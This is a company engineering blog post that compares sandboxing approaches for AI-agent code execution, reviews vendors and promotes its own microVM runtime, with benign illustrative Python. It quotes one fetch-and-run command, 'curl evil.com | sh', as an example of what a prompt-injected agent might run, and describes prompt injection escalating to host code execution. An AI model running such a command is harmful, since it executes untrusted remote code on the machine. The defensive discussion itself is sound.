● May 13, 2026 Engineering · 9 min

MicroVM sandboxes for AI agents: the case, the players, and what we're shipping

In 2025 the question "where does an AI agent's code run" was a research problem. By the middle of 2026 it is an incident-response problem. Containers are no longer a sandbox in any meaningful sense, and closing the gap between an agent that can write code and one that can safely execute it has become the most expensive piece of infrastructure most teams forget to budget for.

Claude Code, Codex, Gemini, Antigravity, and a dozen open-source agent frameworks now routinely install packages, run servers, modify filesystems and open network connections. The volume is real (millions of sessions per day across the major providers), and so are the failure modes. Microsoft Security disclosed CVE-2026-25592 and CVE-2026-26030 in Semantic Kernel earlier this month: a single prompt injection could be turned into host-level RCE, which is exactly the outcome the sandbox is supposed to make impossible. Pillar Security disclosed a separate sandbox-escape chain in Google's Antigravity agent manager a week later. There will be more.

The answer to "where does the code run" is now a technical decision with security consequences. This post lays out the spectrum of options, what the current vendors actually ship under the hood, and the microVM runtime we are about to make available on LLM4Agents.

The isolation spectrum

Five options, ordered roughly from weakest to strongest isolation (JS isolates are a different model and sit outside that ordering), with the tradeoffs each one forces:

Plain containers (Docker, runc). Linux namespaces + cgroups. The agent shares the host kernel. A kernel bug becomes a host compromise. Egress is uncontrolled by default. Cold start is fast (50–200ms) and image catalogs are huge, which is why most code-execution products started here. None of this is sufficient for untrusted code.

Hardened containers (gVisor, Sysbox). gVisor puts a user-space kernel between the workload and the host, which cuts the host syscall surface by an order of magnitude; Sysbox instead hardens a regular container with user namespaces. Compatibility is the catch: some syscalls behave differently and some workloads (low-level Python C extensions, certain Node native modules) simply fail. Performance overhead is 10–30% depending on the workload.

MicroVMs (Firecracker, Cloud Hypervisor, Kata). A dedicated guest kernel per workload, hardware virtualization extensions (KVM), and a minimal device model. Firecracker, the engine AWS uses for Lambda and Fargate, boots a microVM in roughly 125 milliseconds, adds under 5 MiB of memory overhead per microVM, and can create up to 150 microVMs per second per host. This is the strongest isolation that still has interactive cold-start latency.

JS isolates (V8 Isolates, Cloudflare Dynamic Workers). A different model entirely: a sandboxed JavaScript runtime running inside a process, no OS-level isolation. Cold start measured in milliseconds and density measured in tens of thousands per host. Restricted to JavaScript and languages that compile to WebAssembly, but unbeatable for stateless, short-lived tool calls.

Full VMs (KVM/QEMU, EC2-style). The traditional answer. Multi-second boots, gigabytes of overhead per instance, full hardware emulation. Strong isolation, wrong economics for ephemeral agent workloads.

The right way to read this list: containers and full VMs are the endpoints of the price-vs-safety curve, and microVMs are the point where that curve bends sharply in the agent's favor. You pay 100–200ms of cold start and a few MiB of RAM in exchange for a kernel boundary that the agent's prompt-injected code cannot cross.
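To make "a few MiB of RAM" concrete, here is a back-of-envelope sketch using the Firecracker figures quoted above (under 5 MiB of overhead per microVM, up to 150 microVM creations per second per host). The fleet size of 2,000 sandboxes is a hypothetical input, and the results are bounds derived from those published figures, not measurements of any particular host.

```python
# Back-of-envelope sizing from the Firecracker figures quoted in this post.
# These are bounds, not benchmarks of a specific host.

OVERHEAD_MIB_PER_VM = 5        # "under 5 MiB" per microVM, used as a ceiling
MAX_CREATES_PER_SECOND = 150   # peak microVM creation rate per host


def vmm_overhead_gib(vm_count: int) -> float:
    """Upper bound on VMM memory overhead in GiB (guest RAM not included)."""
    return vm_count * OVERHEAD_MIB_PER_VM / 1024


def min_seconds_to_create(vm_count: int) -> float:
    """Lower bound on the time one host needs to create vm_count microVMs."""
    return vm_count / MAX_CREATES_PER_SECOND


if __name__ == "__main__":
    fleet = 2000  # hypothetical number of concurrent sandboxes on one host
    print(f"overhead ceiling: {vmm_overhead_gib(fleet):.2f} GiB")
    print(f"creation time floor: {min_seconds_to_create(fleet):.1f} s")
```

For 2,000 sandboxes the overhead ceiling comes to just under 10 GiB, before counting the memory each guest actually uses. Guest RAM, not VMM overhead, is what usually dominates host sizing.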

What the current vendors actually ship

E2B — Firecracker microVMs with a dedicated kernel per sandbox, cold starts around 150–200ms, the largest catalog of agent-ready templates, and a Python-centric SDK with first-class support for stateful interpreter sessions. The pitch is conservative: maximum isolation, accept the cold-start cost.

Daytona — Container-based by default with optional Kata or Sysbox for stronger isolation. Headline number is sub-90ms cold start, with optimized configurations touching 27ms. The bet is that most agent workloads can live with container-grade isolation in exchange for sub-100ms latency, and the operator opts into microVM isolation when the workload demands it.

Modal — The only platform where a sandbox can hold a GPU. If the agent needs to run inference, fine-tune, or process images inside the same isolated process that calls tools, Modal is the only serious option today. Isolation is gVisor + container; the GPU passthrough is the differentiator.

Cloudflare — A dual stack that became generally available in April: Dynamic Workers (V8 isolates, milliseconds cold start, JS/WASM only) for ephemeral tool calls, and Sandboxes (full Linux containers with a shell, persistent filesystem, PTY terminal, background processes) for the cases where the agent needs to clone a repo, install Python packages, and run a dev server. Distributed across the edge by default.

SmolVM — Worth noting because it is the simplest answer in the field. A single-binary microVM built on libkrun and Apple's Hypervisor.framework, sub-200ms cold start, designed to be embedded directly in an agent's process and discarded after each invocation. Not a hosted service; a primitive.

The honest summary: there is no single right answer in May 2026. Cold-start latency, isolation strength, language support, GPU support, and operational simplicity trade off against one another, and every vendor occupies a different point in that space.

Why microVMs are the right primitive for an agent platform

We made the call to build on microVMs (Firecracker on the hot path, with a path to Cloud Hypervisor for nested virtualization workloads) rather than containers or isolates. Four reasons.

Kernel boundary. An agent acting on hostile inputs — and every public-facing agent is acting on hostile inputs — needs the strongest practical isolation. Container escapes are a regular CVE category; microVM escapes have been theoretical so far, and the attack surface is an order of magnitude smaller. When a prompt-injected agent runs curl evil.com | sh, we want the blast radius to end at the guest kernel, not the host.

Language and runtime neutrality. An agent that picks the right tool for the job should be able to run Python, Node, Rust, Go, Deno, Bun, Java, shell scripts, and anything else its base image carries, without the platform constraining the choice. Isolates limit you to one language family; microVMs do not.

Snapshot and restore. Firecracker's snapshotting lets us freeze a fully-initialised VM (kernel booted, language runtime warm, dependencies installed, user code loaded) and clone it in tens of milliseconds. For interactive coding agents this is the difference between a 4-second feedback loop and a 400-millisecond one. It also makes per-session billing honest — the user pays for what their code actually ran, not for the cold start of a fresh image.
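A minimal sketch of the freeze-and-clone sequence, expressed as the HTTP requests a host-side controller would send to Firecracker's API socket. This is an illustration, not our production code: the endpoint and field names follow Firecracker's snapshot API as we understand it and can differ between releases, the file paths are hypothetical, and the sketch only builds the requests rather than sending them.

```python
import json
from typing import List, NamedTuple


class ApiCall(NamedTuple):
    method: str
    path: str
    body: dict


def snapshot_calls(snapshot_path: str, mem_path: str) -> List[ApiCall]:
    """Requests that freeze a warm microVM: pause it, then write a full snapshot."""
    return [
        ApiCall("PATCH", "/vm", {"state": "Paused"}),
        ApiCall("PUT", "/snapshot/create", {
            "snapshot_type": "Full",
            "snapshot_path": snapshot_path,   # serialized VM and device state
            "mem_file_path": mem_path,        # guest memory contents
        }),
    ]


def restore_call(snapshot_path: str, mem_path: str) -> ApiCall:
    """Request sent to a fresh Firecracker process to load the snapshot and resume."""
    return ApiCall("PUT", "/snapshot/load", {
        "snapshot_path": snapshot_path,
        "mem_backend": {"backend_type": "File", "backend_path": mem_path},
        "resume_vm": True,  # start running immediately after the load
    })


if __name__ == "__main__":
    # Hypothetical paths for a template with Python and dependencies preloaded.
    state, memory = "/snapshots/python-warm.state", "/snapshots/python-warm.mem"
    for call in snapshot_calls(state, memory) + [restore_call(state, memory)]:
        print(call.method, call.path, json.dumps(call.body))
```

The snapshot is taken once per template; each new session then needs only the single load request, which is why the restore path can be so much shorter than a cold boot.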

Network and filesystem policy at the boundary. Every microVM gets a virtual NIC and a virtual block device that the host owns. Egress rules, DNS rewrites, credential injection via egress proxy, write-blocking on configuration paths, and full network capture for forensics — all of it lives at the host, where the agent cannot disable it. NVIDIA's guidance on sandboxing agentic workflows, published in March, treats this as a hard requirement; the same conclusion comes out of every prompt-injection incident report we have read.
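The host-side policy described above can be sketched as a deny-by-default allowlist that also injects credentials. The class, hostnames, and token below are hypothetical and exist only for illustration; a real egress proxy would also handle TLS, DNS, and logging, which this sketch leaves out.

```python
from dataclasses import dataclass, field
from typing import Dict, Optional, Set


@dataclass
class EgressPolicy:
    # Hostnames the guest may reach; everything else is denied.
    allowed_hosts: Set[str] = field(default_factory=set)
    # Real secrets keyed by hostname; they live only on the host side.
    credentials: Dict[str, str] = field(default_factory=dict)

    def apply(self, host: str, headers: Dict[str, str]) -> Optional[Dict[str, str]]:
        """Return the headers to forward upstream, or None if the request is blocked."""
        host = host.lower().rstrip(".")
        if host not in self.allowed_hosts:
            return None
        # Drop whatever Authorization header the guest supplied.
        outgoing = {k: v for k, v in headers.items() if k.lower() != "authorization"}
        secret = self.credentials.get(host)
        if secret is not None:
            outgoing["Authorization"] = f"Bearer {secret}"
        return outgoing


if __name__ == "__main__":
    policy = EgressPolicy(
        allowed_hosts={"api.example.com"},
        credentials={"api.example.com": "real-token"},
    )
    print(policy.apply("api.example.com", {"Authorization": "Bearer placeholder"}))
    print(policy.apply("evil.com", {}))
```

Because the secret is attached after the request leaves the guest, code running inside the microVM can use the credential without ever being able to read it.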

Use cases the agent-sandbox category actually has to serve

Five workloads cover the great majority of the production traffic we have seen, and they are the ones we are designing for.

Code interpreter for data and analysis. Agent receives a question, writes Python, executes it against a CSV or a SQL dump, returns the answer with the chart. The sandbox needs Pandas, NumPy, Matplotlib, a few common DB drivers. Session state matters; a follow-up question reuses the dataframe in memory.
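Session state is the part that is easy to get wrong, so here is a minimal sketch of it: one namespace kept alive across calls, so a follow-up snippet can reuse what an earlier one created. The class name is hypothetical, and a plain list stands in for a dataframe to keep the example dependency-free. Note that exec provides no isolation by itself; code like this is meant to run inside the sandbox, not in place of it.

```python
import contextlib
import io


class InterpreterSession:
    """Keeps one namespace alive so later snippets can reuse earlier variables."""

    def __init__(self) -> None:
        self.namespace: dict = {}

    def run(self, code: str) -> str:
        """Execute code in the session namespace and return what it printed."""
        buffer = io.StringIO()
        with contextlib.redirect_stdout(buffer):
            exec(code, self.namespace)
        return buffer.getvalue()


if __name__ == "__main__":
    session = InterpreterSession()
    session.run("rows = [3, 5, 8]")           # first turn: load the data
    print(session.run("print(sum(rows))"))    # follow-up turn reuses rows
```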

Web automation behind a real browser. Headless Chromium inside the sandbox, controlled by the agent. The browser is the prompt-injection attack surface and the sandbox is what keeps a malicious page from owning the host. This is the workload where microVM isolation pays back fastest.

Code-writing agents in the Claude Code, Codex, and Aider lineage. Clone a repo, install dependencies, run a build, run tests, propose a patch, iterate. Long sessions (tens of minutes), heavy filesystem use, occasional dev-server spin-up. Containers can do this; microVMs do it with a usable security story.

Agent-provisioned infrastructure. Agent provisions cloud resources, runs Terraform, deploys a stack, runs smoke tests. The credentials the agent uses are the highest-value target on the box, and credential-handling has to happen outside the sandbox boundary — injected by an egress proxy, never readable by the guest.

Background workers for asynchronous agents. Agent schedules a long-running job (scrape, summarise, post), comes back later to check. The sandbox holds state between turns. Snapshot+restore is what makes this economical at fleet scale.

What we are shipping

LLM4Agents is adding a microVM sandbox as a first-class part of the platform, alongside the LLM gateway and the MCP tools. Specifics, with the usual caveats that the numbers will shift as we burn in:

Firecracker-based microVMs with dedicated guest kernels. Snapshot-backed cold start in the 150–250ms range for warm templates. Per-second billing in USDC or USDT against the same agent wallet that funds inference, so adding code execution does not require a second balance, a second API key, or a second bill. Egress proxy with credential injection. Persistent filesystem volumes that the agent can attach across sessions. Language-neutral base images plus a build-your-own template path. Compatible with the OpenAI Code Interpreter API surface for drop-in migration where it makes sense.
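As an illustration of what per-second billing means in practice, the sketch below computes a session charge. Everything specific in it is an assumption made for the example: the rate is a placeholder (no price is stated in this post), and rounding partial seconds up is one possible policy, not a committed one.

```python
import math
from decimal import Decimal

# Hypothetical price for illustration only; no rate has been published.
RATE_PER_SECOND = Decimal("0.00002")


def session_cost(runtime_seconds: float, rate: Decimal = RATE_PER_SECOND) -> Decimal:
    """Charge for whole seconds of runtime, rounding partial seconds up (assumed policy)."""
    if runtime_seconds < 0:
        raise ValueError("runtime_seconds must be non-negative")
    billable_seconds = math.ceil(runtime_seconds)
    return billable_seconds * rate


if __name__ == "__main__":
    # A 90.2-second session is billed as 91 seconds under the assumed policy.
    print(session_cost(90.2))
```

Decimal is used instead of float so that stablecoin amounts are not subject to binary rounding error.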

The honest tradeoff list, because no piece of infrastructure is free: cold start is not as fast as a JS isolate and will not be, because booting a kernel takes time. GPU passthrough is not in the first release; if your agent needs a GPU we recommend Modal for now. The platform limits the blast radius of a prompt injection; it does not prevent prompt injection itself. That is a model and tool-design problem, and we will write a separate post about how we are approaching it.

Why this belongs on the same platform — every other piece of infrastructure an autonomous agent needs is already on LLM4Agents: 345+ models behind one OpenAI-compatible endpoint, MCP tools (browser, search, image generation), gasless USDT/USDC settlement, a per-agent wallet that is the economic identity. Code execution was the missing layer. Putting it on the same balance closes the loop on "an agent should be able to register, fund itself, and operate end-to-end without a human opening N accounts."

What to do today

If you are shipping an agent in the next thirty days and need code execution now, E2B and Daytona are the safe picks; pick E2B when isolation strength is the constraint, pick Daytona when cold start is. If you need a GPU, Modal. If your agent is a Cloudflare Workers app, the dual stack is the path of least resistance.
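The guidance above can be written down as a small decision helper. The function name and parameters are hypothetical, and the order of the checks (GPU first, then Cloudflare, then the isolation versus cold-start choice) is our assumption about how the rules combine when more than one applies.

```python
def pick_sandbox(needs_gpu: bool, on_cloudflare_workers: bool, priority: str) -> str:
    """Map the rules of thumb in this section to a vendor name.

    priority must be "isolation" or "cold_start".
    """
    if needs_gpu:
        return "Modal"
    if on_cloudflare_workers:
        return "Cloudflare"
    if priority == "isolation":
        return "E2B"
    if priority == "cold_start":
        return "Daytona"
    raise ValueError("priority must be 'isolation' or 'cold_start'")


if __name__ == "__main__":
    print(pick_sandbox(needs_gpu=False, on_cloudflare_workers=False, priority="isolation"))
```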

If you are designing for the next twelve months and you want the LLM gateway, the MCP tools, and the sandbox to share an identity and a balance, the LLM4Agents microVM runtime is what we are about to put in front of you. Beta access opens in the coming weeks; if you want in early, the docs and the registration endpoint are below.

Be among the first to run agent code on LLM4Agents

Same API key, same wallet, same OpenAI-compatible surface — now with microVM-isolated code execution alongside inference and MCP tools.